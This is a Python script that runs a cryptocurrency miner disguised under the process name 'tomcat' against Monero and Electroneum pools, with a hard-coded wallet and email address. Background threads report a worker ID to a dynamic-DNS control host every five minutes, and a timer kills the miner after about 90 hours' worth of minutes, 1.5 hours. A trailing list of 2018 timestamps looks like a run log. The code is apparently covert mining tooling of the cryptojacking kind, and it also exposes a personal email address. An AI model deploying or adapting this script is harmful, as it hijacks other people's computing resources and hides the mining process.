import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:26:05.177342
#2018-02-17 16:14:06.136184
#2018-02-17 18:02:06.765173
#2018-02-17 19:49:06.346729
#2018-02-17 21:36:03.847563
#2018-02-17 23:20:03.924674
#2018-02-18 01:08:07.503769
#2018-02-18 02:56:05.551305
#2018-02-18 04:46:06.178668
#2018-02-18 06:37:05.150312
#2018-02-18 08:26:07.514753
#2018-02-18 10:14:01.478011
#2018-02-18 12:00:11.716508
#2018-02-18 13:45:04.358457
#2018-02-18 15:37:06.821039
#2018-02-18 17:26:05.351179
#2018-02-18 19:13:06.950806
#2018-02-18 20:59:02.009270
#2018-02-18 22:44:06.855914
#2018-02-19 00:33:05.835592
#2018-02-19 02:18:07.916808
#2018-02-19 04:06:04.186702
#2018-02-19 05:50:08.870741
#2018-02-19 07:40:08.381391
#2018-02-19 09:29:05.781361
#2018-02-19 11:18:07.411829
#2018-02-19 13:06:07.648258
#2018-02-19 14:54:07.916636
#2018-02-19 16:43:04.197642
#2018-02-19 18:29:04.940594
#2018-02-19 20:16:04.844249
#2018-02-19 22:05:07.643189
#2018-02-19 23:50:11.339223
#2018-02-20 01:37:05.292657
#2018-02-20 03:25:02.946744
#2018-02-20 05:11:07.209821
#2018-02-20 06:54:04.792630
#2018-02-20 08:41:06.169006
#2018-02-20 10:25:06.365386
#2018-02-20 12:10:07.039401
#2018-02-20 13:59:01.328608
#2018-02-20 15:42:09.626340
#2018-02-20 17:28:09.639967
#2018-02-20 19:17:08.793393
#2018-02-20 21:07:04.914318
#2018-02-20 22:51:07.366269
#2018-02-21 00:33:06.479550
#2018-02-21 02:18:04.880961
#2018-02-21 04:06:02.299151
#2018-02-21 05:53:01.885006
#2018-02-21 07:41:06.303540
#2018-02-21 09:26:07.483629
#2018-02-21 11:15:09.090792
#2018-02-21 13:02:05.340859
#2018-02-21 14:50:12.074943
#2018-02-21 16:37:06.407030
#2018-02-21 18:28:07.083469
#2018-02-21 20:14:04.114441
#2018-02-21 22:01:04.651862
#2018-02-21 23:47:08.321805
#2018-02-22 01:34:03.917377
#2018-02-22 03:22:06.858096
#2018-02-22 05:09:05.366566
#2018-02-22 06:53:06.868989
#2018-02-22 08:40:06.998371
#2018-02-22 10:27:07.051277
#2018-02-22 12:12:01.356072
#2018-02-22 13:57:10.417275
#2018-02-22 15:46:03.000419
#2018-02-22 17:32:08.413209
#2018-02-22 19:18:07.564926
#2018-02-22 21:09:03.422102
#2018-02-22 22:53:08.907752
#2018-02-23 00:41:02.092452
#2018-02-23 02:27:01.411273
#2018-02-23 04:16:05.209733
#2018-02-23 06:03:05.538286
#2018-02-23 07:48:04.909429
#2018-02-23 09:49:01.902942
#2018-02-23 11:49:04.714621
#2018-02-23 13:38:07.528417
#2018-02-23 15:26:04.686650
#2018-02-23 17:16:09.293998
#2018-02-23 19:01:11.193863
#2018-02-23 20:48:04.773040
#2018-02-23 22:36:06.139790
#2018-02-24 00:22:07.156361
#2018-02-24 02:15:07.874464
#2018-02-24 04:05:07.042604
#2018-02-24 05:50:07.964986
#2018-02-24 07:40:01.788003
#2018-02-24 09:25:04.128091
#2018-02-24 11:19:02.114622
#2018-02-24 13:08:04.247736
#2018-02-24 14:58:07.108292
#2018-02-24 16:47:05.855964
#2018-02-24 18:35:07.483262
#2018-02-24 20:24:05.922177
#2018-02-24 22:20:07.202940
#2018-02-25 02:34:04.936818
#2018-02-25 06:15:01.630798
#2018-02-25 11:40:06.713021